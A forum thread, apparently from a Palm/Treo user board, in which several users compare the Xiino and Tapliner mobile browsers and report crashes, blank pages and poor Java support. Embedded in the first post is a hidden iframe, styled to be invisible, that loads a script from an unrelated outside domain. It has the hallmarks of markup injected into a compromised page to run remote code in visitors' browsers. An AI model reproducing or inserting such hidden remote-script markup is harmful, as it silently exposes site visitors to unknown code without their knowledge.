Comments welcomed. I was made aware of these from the smartphone source board (dedicated to the 6035 and the future 7135).<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Of these two, I chose Xiino. I was able to download TapLiner some time ago (searched thru program files but could not find it), but had no success with it. It looked quite promising but crashed every time. Many soft resets. Biggest drawback, in my opinion, to Xiino was not seeing graphics on many pages as a whole on my screen. Images are broken down into smaller boxes and "stacked". Tapliner looked promising because you could see the whole page as intended... but the short glimpse I got of any page (before crashing) was too small to read. I licensed Xiino. I probably deleted Tapliner download file out of frustration.
Anyone know anything about this browser. I did a search on here but didn't find much. Tapliner's site says it displays web pages exactly like your desktop, and that it supports java and all sorts of stuff. Has anyone tried this or know anything about it?
i tried it and got fatal errors requiring a cold boot. i have not tried the XIINO browser, but i have heard it works well and a little better than tapliner...
I downloaded Tapliner demo last night. I cannot get the High Quality Mode to work. When I select it and load a page, it say its done loading but the screen is blank, not sure why!?. I tried the High Speed mode (which looks like Blazer but not quite as good) and it is slower than the normal non-3G speed. Their website also said that it supports all kinds of Java scripts and applets, but I could not get any of those to work. The demo I downloaded was for the Handspring Treo, it did not specify which Treo so maybe its not compatible with the 300. So my experience, to sum up, High quality does not seem to function at all, and the High speed mode is slower than anything and looks worse than Blazer. I would avoid this browser. So, for the XINO users, is XINO better or worse than Blazer. And, does it support Java or anything?
